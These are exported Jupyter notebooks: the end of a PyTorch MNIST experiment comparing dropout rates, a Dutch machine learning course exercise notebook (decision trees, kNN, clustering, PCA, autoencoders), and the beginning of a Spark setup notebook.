Epoch:3 dropout: 0.5
Learning rate: 0.05
Validation accuracy: 0.9708333333333333
Epoch:4 dropout: 0.5
Learning rate: 0.05
Validation accuracy: 0.9686666666666667
Epoch:5 dropout: 0.5
Learning rate: 0.05
Validation accuracy: 0.9705
Epoch:6 dropout: 0.5
Learning rate: 0.05
Validation accuracy: 0.9668333333333333
Epoch:7 dropout: 0.5
Learning rate: 0.05
Validation accuracy: 0.9731666666666666
Epoch:8 dropout: 0.5
Learning rate: 0.05
Validation accuracy: 0.964
Epoch:9 dropout: 0.5
Learning rate: 0.05
Validation accuracy: 0.9748333333333333
Epoch:10 dropout: 0.5
Learning rate: 0.045000000000000005
Validation accuracy: 0.9773333333333334
Epoch:11 dropout: 0.5
Learning rate: 0.045000000000000005
Validation accuracy: 0.9761666666666666
Epoch:12 dropout: 0.5
Learning rate: 0.045000000000000005
Validation accuracy: 0.9748333333333333
Epoch:13 dropout: 0.5
Learning rate: 0.045000000000000005
Validation accuracy: 0.9773333333333334
Epoch:14 dropout: 0.5
Learning rate: 0.045000000000000005
Validation accuracy: 0.9748333333333333
Epoch:15 dropout: 0.5
Learning rate: 0.045000000000000005
Validation accuracy: 0.9783333333333334
Epoch:16 dropout: 0.5
Learning rate: 0.045000000000000005
Validation accuracy: 0.9735
Epoch:17 dropout: 0.5
Learning rate: 0.045000000000000005
Validation accuracy: 0.9773333333333334
Epoch:18 dropout: 0.5
Learning rate: 0.045000000000000005
Validation accuracy: 0.9755
Epoch:19 dropout: 0.5
Learning rate: 0.045000000000000005
Validation accuracy: 0.9758333333333333
Epoch:20 dropout: 0.5
Learning rate: 0.04050000000000001
Validation accuracy: 0.977
Epoch:21 dropout: 0.5
Learning rate: 0.04050000000000001
Validation accuracy: 0.9763333333333334
Epoch:22 dropout: 0.5
Learning rate: 0.04050000000000001
Validation accuracy: 0.9775
Epoch:23 dropout: 0.5
Learning rate: 0.04050000000000001
Validation accuracy: 0.9755
Epoch:24 dropout: 0.5
Learning rate: 0.04050000000000001
Validation accuracy: 0.9766666666666667
Epoch:25 dropout: 0.5
Learning rate: 0.04050000000000001
Validation accuracy: 0.9805
Epoch:26 dropout: 0.5
Learning rate: 0.04050000000000001
Validation accuracy: 0.9775
Epoch:27 dropout: 0.5
Learning rate: 0.04050000000000001
Validation accuracy: 0.9785
Epoch:28 dropout: 0.5
Learning rate: 0.04050000000000001
Validation accuracy: 0.9783333333333334
Epoch:29 dropout: 0.5
Learning rate: 0.04050000000000001
Validation accuracy: 0.9773333333333334
Epoch:30 dropout: 0.5
Learning rate: 0.03645000000000001
Validation accuracy: 0.9803333333333333
Epoch:31 dropout: 0.5
Learning rate: 0.03645000000000001
Validation accuracy: 0.9796666666666667
Epoch:32 dropout: 0.5
Learning rate: 0.03645000000000001
Validation accuracy: 0.9776666666666667
Epoch:33 dropout: 0.5
Learning rate: 0.03645000000000001
Validation accuracy: 0.9793333333333333
Epoch:34 dropout: 0.5
Learning rate: 0.03645000000000001
Validation accuracy: 0.981
Epoch:35 dropout: 0.5
Learning rate: 0.03645000000000001
Validation accuracy: 0.9805
Epoch:36 dropout: 0.5
Learning rate: 0.03645000000000001
Validation accuracy: 0.9823333333333333
Epoch:37 dropout: 0.5
Learning rate: 0.03645000000000001
Validation accuracy: 0.9781666666666666
Epoch:38 dropout: 0.5
Learning rate: 0.03645000000000001
Validation accuracy: 0.9793333333333333
Epoch:39 dropout: 0.5
Learning rate: 0.03645000000000001
Validation accuracy: 0.9801666666666666
Epoch:40 dropout: 0.5
Learning rate: 0.03280500000000001
Validation accuracy: 0.9811666666666666
Epoch:41 dropout: 0.5
Learning rate: 0.03280500000000001
Validation accuracy: 0.9803333333333333
Epoch:42 dropout: 0.5
Learning rate: 0.03280500000000001
Validation accuracy: 0.9795
Epoch:43 dropout: 0.5
Learning rate: 0.03280500000000001
Validation accuracy: 0.9773333333333334
Epoch:44 dropout: 0.5
Learning rate: 0.03280500000000001
Validation accuracy: 0.9781666666666666
Epoch:45 dropout: 0.5
Learning rate: 0.03280500000000001
Validation accuracy: 0.9791666666666666
Epoch:46 dropout: 0.5
Learning rate: 0.03280500000000001
Validation accuracy: 0.9801666666666666
Epoch:47 dropout: 0.5
Learning rate: 0.03280500000000001
Validation accuracy: 0.9788333333333333
Epoch:48 dropout: 0.5
Learning rate: 0.03280500000000001
Validation accuracy: 0.9808333333333333
Epoch:49 dropout: 0.5
Learning rate: 0.03280500000000001
Validation accuracy: 0.9798333333333333
Epoch:0 dropout: 0.75
Learning rate: 0.05
Validation accuracy: 0.5011666666666666
Epoch:1 dropout: 0.75
Learning rate: 0.05
Validation accuracy: 0.5135
Epoch:2 dropout: 0.75
Learning rate: 0.05
Validation accuracy: 0.5058333333333334
Epoch:3 dropout: 0.75
Learning rate: 0.05
Validation accuracy: 0.6595
Epoch:4 dropout: 0.75
Learning rate: 0.05
Validation accuracy: 0.5408333333333334
Epoch:5 dropout: 0.75
Learning rate: 0.05
Validation accuracy: 0.6855
Epoch:6 dropout: 0.75
Learning rate: 0.05
Validation accuracy: 0.7258333333333333
Epoch:7 dropout: 0.75
Learning rate: 0.05
Validation accuracy: 0.5355
Epoch:8 dropout: 0.75
Learning rate: 0.05
Validation accuracy: 0.5601666666666667
Epoch:9 dropout: 0.75
Learning rate: 0.05
Validation accuracy: 0.5706666666666667
Epoch:10 dropout: 0.75
Learning rate: 0.045000000000000005
Validation accuracy: 0.5713333333333334
Epoch:11 dropout: 0.75
Learning rate: 0.045000000000000005
Validation accuracy: 0.5448333333333333
Epoch:12 dropout: 0.75
Learning rate: 0.045000000000000005
Validation accuracy: 0.5766666666666667
Epoch:13 dropout: 0.75
Learning rate: 0.045000000000000005
Validation accuracy: 0.5808333333333333
Epoch:14 dropout: 0.75
Learning rate: 0.045000000000000005
Validation accuracy: 0.5835
Epoch:15 dropout: 0.75
Learning rate: 0.045000000000000005
Validation accuracy: 0.5678333333333333
Epoch:16 dropout: 0.75
Learning rate: 0.045000000000000005
Validation accuracy: 0.5818333333333333
Epoch:17 dropout: 0.75
Learning rate: 0.045000000000000005
Validation accuracy: 0.6265
Epoch:18 dropout: 0.75
Learning rate: 0.045000000000000005
Validation accuracy: 0.6201666666666666
Epoch:19 dropout: 0.75
Learning rate: 0.045000000000000005
Validation accuracy: 0.6175
Epoch:20 dropout: 0.75
Learning rate: 0.04050000000000001
Validation accuracy: 0.6065
Epoch:21 dropout: 0.75
Learning rate: 0.04050000000000001
Validation accuracy: 0.592
Epoch:22 dropout: 0.75
Learning rate: 0.04050000000000001
Validation accuracy: 0.5908333333333333
Epoch:23 dropout: 0.75
Learning rate: 0.04050000000000001
Validation accuracy: 0.6008333333333333
###Markdown
**Plotting learning curves for validation and train dataset**
###Code
def plot_x_y_vals(x_vals, y_vals, x_label, y_label, label, line_titles):
for i in range(len(x_vals)):
plt.plot(x_vals[i], y_vals[i], label=line_titles[i])
plt.title(label)
plt.legend()
plt.xlabel(x_label)
plt.ylabel(y_label)
plt.show()
for i in tr_accuracy_list:
epocs = [i+1 for i in range(len(tr_accuracy_list[i]))]
plot_x_y_vals([epocs, epocs], [tr_accuracy_list[i], val_accuracy_list[i]], "Epochs", "Accuracy", "Train & Validation Accuracy, drop: " + str((i+1)*0.25), ["train", "validation"])
plot_x_y_vals([epocs, epocs], [tr_avg_loss_list[i], val_avg_loss_list[i]], "Epochs", "Loss", "Train & Validation Loss, drop: " + str((i+1)*0.25), ["train", "validation"])
###Output
_____no_output_____
###Markdown
**Overfit or Underfit? Why is validation accuracy higher than training accuracy?**Surprisingly, we see that validation accuracy is higher than training accuracy. This is because of the dropout layer. During training phase, the dropout layers set some of the values to zero, while in evaluation phase, that does not happen. That is why during the validation phase, our model performs better.**For dropout = 0.25**, we see that model has done really well.Validation accuracy continues to increase while validation loss continues to decrease. While dropout layer makes sure that the model doesnt overfit. With dropout = 0.25, we seem to have achieved that balance where the plot is indicating that it neither overfits nor underfits. As the validation and training are converging in the plot. As can be seen in the plot, the validation accuracy stands around ~98%**For Dropout = 0.5**, we see that model doesnt perform as good as with dropout = 0.25, and the accuracy is around ~98%, This could be very slightly better, and is a sign of **slightly underfitting.** This means that our model is too simplistic and only views at most outlining features of the image, while ignoring complicated features of the image. This is because of high dropout value = 0.5, which seem to have removed finer details from the image, leaving the model to only work on most outlining features of the image.**for Dropout = 0.75**, we see that model gets an accuracy around 60%. Definitlely not as good, and is **underfitting**. Primarily because the dropout layers have removed most of the relevant information, making the model to only work on simplified data. Due to which model makes very generic assumptions about the images. **Checking the accuracy of test set**
###Code
total_accurate = [0,0,0]
total_values = [0,0,0]
errors={0:{i:{j:0 for j in range(10)} for i in range(10)}, 1:{i:{j:0 for j in range(10)} for i in range(10)}, 2:{i:{j:0 for j in range(10)} for i in range(10)}}
incorrect_samples = {0:[], 1:[], 2:[]}
correct_samples = {0:[], 1:[], 2:[]}
def calculate_class_wise_errors(local_labels, sel_class, local_batch, model_num):
true_labels = local_labels[sel_class.not_equal(local_labels)]
predicted = sel_class[sel_class.not_equal(local_labels)]
for (i, t), (i,p) in zip(enumerate(true_labels), enumerate(predicted)):
errors[model_num][t.item()][p.item()] += 1
true_labels = local_labels[sel_class.eq(local_labels)]
predicted = sel_class[sel_class.eq(local_labels)]
for (i, t), (i,p) in zip(enumerate(true_labels), enumerate(predicted)):
errors[model_num][t.item()][p.item()] += 1
if len(incorrect_samples[model_num]) < 10:
samples = local_batch[sel_class.not_equal(local_labels)]
predicted = sel_class[sel_class.not_equal(local_labels)]
true_labels = local_labels[sel_class.not_equal(local_labels)]
for (i,s), (i,p), (i, t) in zip(enumerate(samples), enumerate(predicted), enumerate(true_labels)):
incorrect_samples[model_num].append((s.cpu().numpy(), p.cpu().numpy(), t.cpu().numpy()))
if len(correct_samples[model_num]) < 10:
samples = local_batch[sel_class.eq(local_labels)]
predicted = sel_class[sel_class.eq(local_labels)]
true_labels = local_labels[sel_class.eq(local_labels)]
for (i,s), (i,p), (i, t) in zip(enumerate(samples), enumerate(predicted), enumerate(true_labels)):
correct_samples[model_num].append((s.cpu().numpy(), p.cpu().numpy(), t.cpu().numpy()))
for model_num, cnn_model in enumerate(cnn_models):
with torch.set_grad_enabled(False):
cnn_model.eval()
for local_batch, local_labels in test_gen:
local_batch = local_batch.float()
local_labels = local_labels.float()
local_batch, local_labels = Variable(local_batch), Variable(local_labels)
local_batch = local_batch.to(device)
local_labels = local_labels.to(device)
out1 = cnn_model(local_batch)
ploss = loss(out1, local_labels.long())
sel_class = torch.argmax(out1, dim=1)
calculate_class_wise_errors(local_labels, sel_class, local_batch, model_num)
total_accurate[model_num] += sel_class.eq(local_labels).sum().item()
total_values[model_num] += local_labels.size(0)
print("Predicted " + str(total_accurate) +" correctly out of " + str(total_values) + "for respective drops: " + str([0.25,0.5,0.75]))
###Output
Predicted [9918, 9844, 6052] correctly out of [10000, 10000, 10000]for respective drops: [0.25, 0.5, 0.75]
###Markdown
As can be seen through test accuracies, the dropout = 0.25 makes the best assumption about the images without under of overfitting. The accuracy is ever so slightly higher than that baseline model.For dropout = 0.5, the model still performs well. However the accuracy is ever so slightly below the baseline. We can say that it **slightly underfits**For dropout = 0.75, the model performs the worse and **greatly underfits** the test data well.Below we are plotting the heatmap, where y-axis represents the actual label and x-axis represents the predicted labels. Pleaase mind that all the diagonal elements have been set to zero. So the heatmap only represents the incorrectly classified label counts.For example row = 4, col = 3 represents the count of images, which were 4, but were actually classified as 3. And the cell (4,4) is left empty, although it should ideally contain count of all the correctly classified images of 4. As this heatmap is generated only to see if there is any pair that is mistaken a lot in the classification OR if there is any bias in our model for any label.We have plotted the heatmap for all three models.
###Code
import seaborn as sns
class_acc = np.zeros((3,10,10))
for d in range(3):
for i in range(10):
for j in range(10):
if i!=j:
class_acc[d,i,j] = errors[d][i][j]
else:
class_acc[d,i,j] = 0
print("Dropout rate of " + str((d+1) * 0.25))
sns.heatmap(class_acc[d])
plt.show()
###Output
Dropout rate of 0.25
###Markdown
**Plotting few incorrectly classified images by our model. We see that these images are ambiguous and little bit hard to interpret or blurry. Each image contains the true value - predicted value pair on top of it.**
###Code
print("Incorrectly classified samples. (True and predicted values)")
for d in range(3):
print("\n\nDropout rate:" + str(d*0.25 + 0.25))
fig, ax = plt.subplots(nrows=2, ncols=5, sharex=True, sharey=True)
ax = ax.flatten()
for i in range(10):
img=np.array(incorrect_samples[d][i][0]).reshape(28,28)
ax[i].imshow(img, cmap="Greys")
ax[i].title.set_text(str(int(incorrect_samples[d][i][2])) + "-" + str(incorrect_samples[d][i][1]))
ax[0].set_yticks([])
ax[0].set_xticks([])
plt.tight_layout()
plt.show()
###Output
Incorrectly classified samples. (True and predicted values)
Dropout rate:0.25
###Markdown
**Plotting few correctly classified images by our model.**
###Code
print("Correctly classified samples. (true and predicted values)")
for d in range(3):
print("\n\nDropout rate:" + str(d*0.25 + 0.25))
fig, ax = plt.subplots(nrows=2, ncols=5, sharex=True, sharey=True)
ax = ax.flatten()
for i in range(10):
img=np.array(correct_samples[d][i][0]).reshape(28,28)
ax[i].imshow(img, cmap="Greys")
ax[i].title.set_text(str(int(correct_samples[d][i][2])) + "-" + str(correct_samples[d][i][1]))
ax[0].set_yticks([])
ax[0].set_xticks([])
plt.tight_layout()
plt.show()
###Output
Correctly classified samples. (true and predicted values)
Dropout rate:0.25
###Markdown
**Plotting below confusion matrix for each class. By each class, we mean all the correct prediction fot that class = true positive. all the images of a class, that were incorrectly classfied as false negative. All the images, not of that class, but classified as of that class as false positive. And all the images that were not of a class and were also classified as not belonging to that class as true negative.****We are plotting confusion matrix for all three cases.**
###Code
import pandas as pd
# Confusion matrix
confusion_arr = np.zeros((3, 10, 4))
confusion_dfs = []
for d in range(3):
for i in range(10):
confusion_arr[d][i][0] = errors[d][i][i] # tp
for j in range(10):
if i!=j:
confusion_arr[d][i][1]+=errors[d][j][i] # fp
for j in range(10):
if i!=j:
confusion_arr[d][i][2]+= errors[d][i][j] # fn
confusion_arr[d][i][3] = total_values[d] - sum(confusion_arr[d][i][:3]) # tn
confusion_dfs.append(pd.DataFrame(confusion_arr[d], columns=["tp", "fp", "fn", "tn"]))
confusion_dfs[d]["precision"] = confusion_dfs[d]["tp"] / (confusion_dfs[d]["tp"] + confusion_dfs[d]["fp"])
confusion_dfs[d]["recall"] = confusion_dfs[d]["tp"] / (confusion_dfs[d]["tp"] + confusion_dfs[d]["fn"])
confusion_dfs[d]["accuracy"] = (confusion_dfs[d]["tp"] + confusion_dfs[d]["tn"]) / 10000
print("Overall Accuracy:" + str(total_accurate[0]/total_values[0]) + " For dropout:" + str(0.25))
confusion_dfs[0]
print("Overall Accuracy:" + str(total_accurate[1]/total_values[1]) + " For dropout:" + str(0.5))
confusion_dfs[1]
print("Overall Accuracy:" + str(total_accurate[2]/total_values[2]) + " For dropout:" + str(0.75))
confusion_dfs[2]
###Output
Overall Accuracy:0.6052 For dropout:0.75
|
Opdrachten_4.ipynb | ###Markdown
Opdrachten bij de Introductie Python voor data science -- deel 4: "Machine Learning"De opdrachten in dit notebook horen bij het vierde deel van de cursus, waarin we Python gebruiken voor machine learning. De meeste van deze opdrachten komen al op de cursusavond aan bod. Ik raad je aan om alle opdrachten waar je niet aan toe komt tijdens de cursus thuis te doen. In sommige gevallen zit er lesmateriaal in wat anders dan in de opdracht niet langskomt in de lesstof.Alle opdrachten hebben een voorbeeld van een uitwerking die wordt geladen wanneer de cellen met "%load XXX" worden uitgevoerd. Let wel:- Probeer het eerst zelf! Je leert er pas echt van door te proberen, eventueel te falen en nog een keer te proberen!- Dit is *een* uitwerking, meerdere varianten zijn waarschijnlijk mogelijk. Overleg bij twijfel gerust met een medecursist, of met de docent! Keuzeopdrachten!Elk opdrachtnummer komt met twee keuzes, a en b. Tijdens de cursus is er slechts tijd genoeg voor 1 van deze, maar kies vooral zelf welke je het meest aanspreekt! Thuis kun je de rest altijd nog eens rustig bekijken. 1. Supervised machine learningSupervised machine learning kent een heel scala aan technieken. In de instructie is al gekeken naar de logistische regressie, een methode om te classificeren. Hiervoor zijn nog meer methoden. Hier kijken we in opdracht 1a naar de beslisbomen, ook wel bekend onder naam decision tree. De dataset over passagiers van de de titanic is voor dit voorbeeld een bekende kandidaat. We maken daarbij meteen kennis met wat "data preparation" tools.Opgave 1b gaat over lineaire regressie en nearest neighbor regressie. Dit zijn methoden om continue variabelen als target value te "leren" (bijvoorbeeld: schat lichaamsgewicht als je de lichaamslengte weet). Hiervoor wordt een kunstmatige dataset gebruikt die we maken met functionaliteiten uit numpy. 1a. Wie overleefde de ramp met de titanic?In de data directory zit een csv met data over de titanic: titanic3.csv. Lees deze met pandas, en bekijk wat er in zit.Er zitten een aantal kollommen in die we voortaan zullen negeren. Maak een array die labels heet van de kolom survived en bewaar als features een DataFrame met daarin de volgende kolommen uit de dataset:- pclass: klasse van de passagies.- sex: geslacht.- age: leeftijd.- sibsp: Aantal broertjes, zusjes en partners aan booord.- parch: Aantal ouders of kinderen aan boord.- fare: Het betaalde bedrag.- embarked: Haven waar is ingestapt (C = Cherbourg; Q = Queenstown; S = Southampton).pclass, sex en embarked zijn categorische variabelen. Gebruik de pandas functie get_dummies() om van deze kolommen dummy variabelen te maken. Wat gebeurt er daardoor mee? Maak daarna van de DataFrame een array die de features gaan worden voor het training algoritme.Er blijkt ook nog missende data voor te komen. Hier kunnen we andere data "imputeren". Gebruik daarvoor sklearn.preprocessing.Imputer() (default parameters zijn OK) en fit daarna een instantie van sklearn.tree.DecisionTreeClassifier (ook met default parameters). Hoe goed is de voorspelling?
###Code
to_include = os.path.join('uitwerkingen', '4-decisiontree.py')
# %load $to_include
###Output
_____no_output_____
###Markdown
Deze beslisboom heeft bijzonder veel vertakkingen. Als je het correct hebt gedaan dan ziet deze er als volgt uit:Onleesbaar dus, maar je kunt het plaatje elders openen om te kijken wat er staat.Maak gebruik van het attribuut feature_importances_ (let op de laatste underscore) om te kijken welke features belangrijk zijn. Waarom is dit niet eenduidig te interpreteren voor deze beslisboom?Maak daarna gebruik van de opties van de DecisionTreeClassifier om een veel simpelere boom te maken. Probeer de lijst van belangrijke features van onderstaande boom te reproduceren door met hyperparameters van de decision tree te spelen.Helaas is een van de grote tekortkomingen van Python in machine learning momenteel nog de visualisatie van beslisbomen. Dit is nu nog erg afhankelijk van het besturingssysteem op je computer en we zullen er dus hier niet op ingaan.
###Code
to_include = os.path.join('uitwerkingen', '4-simpletree.py')
# %load $to_include
###Output
_____no_output_____
###Markdown
1b. Leren van je burenWe gaan kijken naar een regressieprobleem, waar een lineaire regressie het heel aardig zou doen, maar waar extra karakteristieken in de data zitten die door een lineaire regressie niet opgepikt worden. Eerst maken en visualiseren we de dataset:
###Code
x = np.linspace(-3, 3, 100) # honderd putten tussen x=-3 and x=3
rng = np.random.RandomState(42) # Initialiseer een random generator
scatter = rng.uniform(low=-1., high=1., size=len(x)) # Scatter is uniform verdeeld tussen -1 en 1
y = np.sin(4 * x) + x + scatter # y varaibele is een lineaire functie, plus een sinus, plus scatter
plt.plot(x, y, 'o'); # Zo ziet dat eruit!
###Output
_____no_output_____
###Markdown
De lineaire regressie doe ik hier voor, zodat je dat gezien hebt. Ik visualiseer en evalueer ook het resultaat:
###Code
from sklearn.linear_model import LinearRegression
regressor = LinearRegression() # Hyperparameters zijn optioneel in deze stap
X = x[:, np.newaxis] # Numpy trucje om de shape geschikt te krijgen voor sklearn
print("Shape van x:", np.shape(x))
print("Shape van X:", np.shape(X))
regressor.fit(X, y) # Fit het model
print('Fit coefficienten: ', regressor.coef_) # coefficienten worden vermenigvuldig met de onafhankelijke variabele
print('y-as intercept: ', regressor.intercept_) # De intercept wordt apart gefit in dit model
plt.plot(x, y, 'o')
plt.plot(x, regressor.intercept_+regressor.coef_*x, 'k:')
plt.title("Data met lineaire regressie");
###Output
Shape van x: (100,)
Shape van X: (100, 1)
Fit coefficienten: [0.93003279]
y-as intercept: -0.059638513243581374
###Markdown
In het packet sklearn.neighbors zit een regressor die de k-Nearest Neighbors methode gebruikt. Zoek op wat dat betekent. Kun je een voorspelling doen van wat een lage k en een hoge tot gevolg hebben?Gebruik deze regressor om een model te trainen en maak daarna een heel fijn verdeelde reeks punten langs de x-as (op een manier die vergelijkbaar is met hoe de data is gegenereerd bijvoorbeeld) om te kijken wat dat doet met de resulterende "fit". Maak een plot met de datapunten en de regressie voor verschillende waarden van k.
###Code
to_include = os.path.join('uitwerkingen', '4-nearestneighbor.py')
# %load $to_include
###Output
_____no_output_____
###Markdown
2. Unsupervised machine learningWe hebben in de instructie gekeken naar k-means clustering. In de klasse van clusteringalgoritmen kijken we in opgave 2a nog naar niet-sferische clusters met k-means en hoe je problemen daarmee kunt voorkomen door "density-based" en "hierarchische" clustermethoden.Opgave 2b gaat over de andere klasse van unsupervised learning: dimensiereductie en patroonherkenning. We gebruiken hiervoor Principal Component Analysis, IsoMap en t-SNE. De datasets zullen voor je worden gegenereerd en gevisualiseerd. Je mag zelf aan de slag met de algoritmen! 2a. Clustering vervolgdWe hebben KMeans al in werking gezien op blobs. Nu transformeren we de blobs naar langgerekte dingen:
###Code
from sklearn.datasets import make_blobs
X, y = make_blobs(random_state=170, n_samples=600)
plt.scatter(X[:, 0], X[:, 1], s=20, label="Oorspronkelijke blobs")
rng = np.random.RandomState(74)
transformation = rng.normal(size=(2, 2))
X = np.dot( X, transformation) # Het is niet heel belangrijk dat je snapt wat hier gebeurt.
plt.scatter(X[:, 0], X[:, 1], s=20, label="Na transformatie")
plt.legend(loc='lower right');
###Output
_____no_output_____
###Markdown
Op deze nieuwe blobs kun je k-means ook los laten. Doe dat, met 3 clusters (of experimenteer wat) en trek je conclusies!Vergelijk daarna op zowel deze blobs als op de blobs uit het instructienotebook (X1 en X2) de algoritmes DBSCAN (density based) en AgglomerativeClustering (hierarchische clustering).
###Code
to_include = os.path.join('uitwerkingen', '4-clustering.py')
# %load $to_include
###Output
_____no_output_____
###Markdown
2b. PCA en manifold learnersHet aantal dimensies van je dataset verkleinen is vaak een goed idee. Niet alleen helpt het bij het visualiseren, maar veel algoritmen zijn ook betrouwbaarder in minder dimensies. Dit is helemaal waar als er in je data gecorreleerde grootheden zitten, wat feitelijk betekent dat als je de 1 kent, dat je ook al een goed idee hebt van de ander. Je kunt dan in principe af met slechts 1 van deze variabelen.Principal Component Analysis is een techniek om hiermee om te gaan. Beschouw de volgende dataset:
###Code
rnd = np.random.RandomState(5)
X_ = rnd.normal(size=(300, 2))
X_blob = np.dot(X_, rnd.normal(size=(2, 2))) + rnd.normal(size=2)
y = X_[:, 0] > 0
plt.scatter(X_blob[:, 0], X_blob[:, 1], c=y, linewidths=0, s=30)
plt.title("De kleur is een te voorspellen label")
plt.xlabel("feature 1")
plt.ylabel("feature 2");
###Output
_____no_output_____
###Markdown
Het mag duidelijk zijn dat tussen de twee features een lineaire relatie bestaat, waar je verder niks aan hebt. Deze kun je met een lineaire regressie terugvinden en aftrekken, zoals hieronder:
###Code
from sklearn.linear_model import LinearRegression
regressor = LinearRegression()
print("Shape:", np.shape(X_blob))
regressor.fit(X_blob[:,0].reshape(len(X_blob),1), X_blob[:,1]) # Fit the model
print('Weight coefficients: ', regressor.coef_) # coefficients are multiplied with the indepent variable
print('y-axis intercept: ', regressor.intercept_) # The intercept is an extra to this model
plt.scatter(X_blob[:,0], X_blob[:,1] - regressor.intercept_ - regressor.coef_*X_blob[:,0], c=y, linewidths=0, s=30)
plt.axvline(0, linestyle='dotted')
plt.axhline(0, linestyle='dotted');
###Output
Shape: (300, 2)
Weight coefficients: [-0.85152914]
y-axis intercept: -2.7908371815513364
###Markdown
Je ziet al dat de fit niet erg goed was. De oorsprong ligt ook niet in het midden van je data wolk. Bovendien moest je weten dat deze relatie bestond om het te doen. Principal Component Anlysis vindt dergelijke relaties zelf, ook tussen slechts enkele features in een veel grotere set features.Gebruik Principal Component Analysis (uit sklearn.decomposition) en plot de twee componenten tegen elkaar (het aantal componenten is gelijk aan het aantal features in je dataset).
###Code
to_include = os.path.join('uitwerkingen', '4-pca.py')
# %load $to_include
###Output
_____no_output_____
###Markdown
PCA is krachtig en snel, maar vindt alleen lineaire relaties tussen data en lineaire structuren. Als je pech hebt is je data ingewikkelder. In het onderstaande voorbeeld liggen alle datapunten langs een S-curve. Als de kleur hetgeen is dat voorspeld dient te worden, dan is alleen de locatie "langs" de S van belang.Gebruik eerst PCA om te kijken wat dat voor resultaat heeft en of dat je helpt. Je kunt daarna ook IsoMap en t-SNE gebruiken (beide uit sklearn.manifold). Het gaat voor nu te ver om in te gaan op de werking van die algoritmes, maar ze zoeken beide naar consistente structuren van willekeurige vorm in een multi-dimensionale ruimte en geven een versimpelde variant, waarin de "nuttige structuur" behouden is in minder dimensies.Als je tijd en zin hebt kun je onderzoeken hoe lang beide algoritmen erover doen.In de bonusopgaven van het huiswerk gaan we nog een stukje verder op deze vergelijking in.
###Code
from sklearn.datasets import samples_generator
from mpl_toolkits.mplot3d import Axes3D
n_points = 1000
X, color = samples_generator.make_s_curve(n_points, random_state=0)
fig = plt.figure(figsize=(15, 8))
ax = fig.add_subplot(111, projection='3d')
ax.scatter(X[:, 0], X[:, 1], X[:, 2], c=color, cmap=plt.cm.Spectral, s=40)
ax.view_init(10, -72)
to_include = os.path.join('uitwerkingen', '4-Scurve.py')
# %load $to_include
###Output
_____no_output_____
###Markdown
3. Neurale netwerkenVoor het stuk over neurale netwerken zuellen we verder gaan met de MNIST hand-written digits. Opnieuw zijn er twee keuze opdrachten. In 3a. kijken waar naar het gebruik van bottleneck-layers voor dimensiereductie. Een toepassing van auto-encoders als de-noisers (ruisverwijdering uit plaatjes) is het onderwerp van 3b. 3a. Dimensiereductie met neurale netwerken.Een auto-encoder reproduceert de input-laag, maar het is inzichtelijk (en potentieel heel nuttig!) om ook een netwerk met een bottleneck de labels te laten voorspellen. Hieronder proberen we dat voor een bottleneck met slechts twee neuronen.De data wordt eerst voor je ingeladen, daarna is het aan jou om een netwerk met een bottleneck (met twee neuronen) te trainen. Let op dat je neurale netwerk wel weer grotere lagen krijgt na de bottleneck.Gebruik daarna ook de "summary" methode om te kijken of je netwerk eruit ziet zoals je verwacht.
###Code
from sklearn.datasets import fetch_mldata
from sklearn.model_selection import train_test_split
mnist = fetch_mldata("MNIST original", data_home='./data/')
features, labels = mnist.data / 255., mnist.target
# Het splitsen in een training en test set gebeurt hier. Check de documentatie!
xtr, x, ytr, y = train_test_split(features, labels, test_size=0.3)
print("Dimensies van xtr:", xtr.shape)
print("Dimensies van ytr:", ytr.shape)
print("Dimensies van x:", x.shape)
print("Dimensies van y:", y.shape)
to_include = os.path.join('uitwerkingen', '4-nn_dimensiereductie.py')
# %load $to_include
###Output
_____no_output_____
###Markdown
Ik wil hier benadrukken dat 95% van de labels correct is voorspeld (in het voorbeeld in de uitwerking), terwijl er een bottleneck-laag met slechts twee neuronen in het netwerk zit! Die laag heeft slechts 2 outputwaarden, waarna het weer opbouwende netwerk de labels bijna helemaal goed kan voorspellen. *Alle info om de labels te voorspellen ligt dus besloten in die 2 getallen!* Bedenk waar dat voor gebruikt kan worden. Door de plaatjes te encoden met de eerste helft van het netwerk (t/m bottleneck) kun je de plaatjes reduceren tot twee getallen. Door het tweede deel van het newterk, de decoder, te gebruiken op deze twee getallen kun je de labels behoorlijk goed reproduceren. Aangezien de bottleneck-laag tweedimensionaal is, kun je deze ook goed visualiseren. Het zou hierin evident moeten zijn dat er tien verschillende labels zijn. Er wordt gebruik gemaakt van de backend van keras, die een functie kan definieren die de waarden van verschillende layers in je netwerk naar elkaar mapt (feitelijk maak je hier dus de encoder). Definieer zo'n functie met behulp van tensorflow.keras.backend.function(). Zie de documentatie voor hoe dit werkt.Plot alle punten in dit tweedimensionale vlak, geef ze een kleur die correspondeert met het echte label en denk goed na over wat je ziet!
###Code
to_include = os.path.join('uitwerkingen', '4-nn_dimensiereductieresultaat.py')
# %load $to_include
###Output
_____no_output_____
###Markdown
**Als je zin en tijd hebt:**Aangezien dit zo goed werkt, zou het dan ook werken om de plaatjes te reconstrueren met een auto-encoder met een bottleneck-laag van slechts twee neuronen? Probeer het eens!
###Code
to_include = os.path.join('uitwerkingen', '4-nn_kleineencoder.py')
# %load $to_include
###Output
_____no_output_____
###Markdown
3b. Een denoising auto-encoderMaak gebruik van de auto-encoder zoals die in de instructie is langsgekomen. Train deze op "clean" plaatjes van de MNIST cijfers. Voordat je je test set erdoorheen gooit om te zien hoe deze gereconstrueerd worden voeg je er ruis aan toe: elke pixelwaarde wordt verhoogd met een random, klein getal. Bedenk daar zelf een methode voor. Af en toe mag deze waarde best hoog zijn, maar niet te vaak. Visualiseer de plaatjes om jezelf ervan te overtuigen dat wat je gebruikt een handgeschreven getal met een beetje ruis is, en niet vierkantjes vol met voornamelijk ruis.Probeer nu deze te reconstrueren. Als je tijd over hebt kun je ook experimenteren met het trainen inclusief ruis en kijken wat dat doet. Wat ook interessant kan zijn is zowel een auto-encoder als een classifier (voorspeller van de labels) trainen op de training set zonder ruis en dan van ruizige plaatjes het label voorspellen, zowel met als zonder de-noising. Het tweede stuk uitwerking doet dat.
###Code
to_include = os.path.join('uitwerkingen', '4-autoencoder.py')
# %load $to_include
to_include = os.path.join('uitwerkingen', '4-ruisvoorspelling.py')
# %load $to_include
###Output
_____no_output_____ |
Data_load_to_RDS.ipynb | ###Markdown
###Code
import os
# Find the latest version of spark 3.0 from http://www-us.apache.org/dist/spark/ and enter as the spark version
# For example:
spark_version = 'spark-3.1.1'
#spark_version = 'spark-3.<enter version>'
os.environ['SPARK_VERSION']=spark_version
# Install Spark and Java
!apt-get update
!apt-get install openjdk-11-jdk-headless -qq > /dev/null
